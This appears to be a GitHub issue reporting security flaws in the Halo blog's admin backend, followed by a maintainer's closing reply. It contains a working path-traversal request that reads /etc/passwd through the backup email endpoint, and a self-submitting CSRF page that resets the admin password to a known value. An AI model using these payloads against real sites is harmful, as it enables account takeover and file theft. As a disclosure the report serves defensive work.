There is a file download vulnerability

[Artemis1029]

我确定我已经查看了 (标注[ ]为[x])

• Halo 使用文档
• Github Wiki 常见问题
• 其他 Issues

---

我要申请 (标注[ ]为[x])

• BUG 反馈
• 添加新的特性或者功能
• 请求技术支持\

Bug Report

I found that your system have a features to allow user send the backup file to Email : )
code:

    @GetMapping(value = "sendToEmail")
    @ResponseBody
    public JsonResult sendToEmail(@RequestParam("fileName") String fileName,
                                  @RequestParam("type") String type,
                                  HttpSession session) {
        final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
        final User user = (User) session.getAttribute(USER_SESSION_KEY);
        if (null == user.getUserEmail() || StrUtil.isEmpty(user.getUserEmail())) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.backup.no-email"));
        }
        if (StrUtil.equals(OPTIONS.get(BlogPropertiesEnum.SMTP_EMAIL_ENABLE.getProp()), TrueFalseEnum.FALSE.getDesc())) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.no-post"));
        }
        new EmailToAdmin(srcPath, user).start();
        return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.backup.email-success"));
    }

you have do nothing filter with fileName and type from user type in

System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;

so I can use type ../../../../ to download any file I want~
as the HTTP Requests:

GET /admin/backup/sendToEmail?type=../../../../../../../&fileName=etc/passwd HTTP/1.1
Host: *********
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
X-Requested-With: XMLHttpRequest
Connection: close
Cookie:
X-Forwarded-For: 127.0.0.2

and I received the file:

Open it

~
But how can I sign as the admin? XD
I find that you have no csrf protect in the code, so I can use

<html>
  <body>
    <form action="http://youryhostname/admin/profile/save" method="POST" id="test">
      <input type="hidden" name="userId" value="1" />
      <input type="hidden" name="userPass" value="7fef6171469e80d32c0559f88b377245" />
     <!-- password is admin888 -->
      <input type="hidden" name="userName" value="Art3mis" />
      <input type="hidden" name="userDisplayName" value="a" />
      <input type="hidden" name="userEmail" value="art3mis&#64;art3mis&#46;top" />
      <input type="hidden" name="userAvatar" value="" />
      <input type="hidden" name="userDesc" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var f=document.getElementById("test");
    f.submit();
  </script>
</html>

I can leave a url message with the HTML, and you click in, you're password will change to admin888, and I can read you system file to getshell~

[ruibaby]

准备发布 v1，所以关闭该 issue。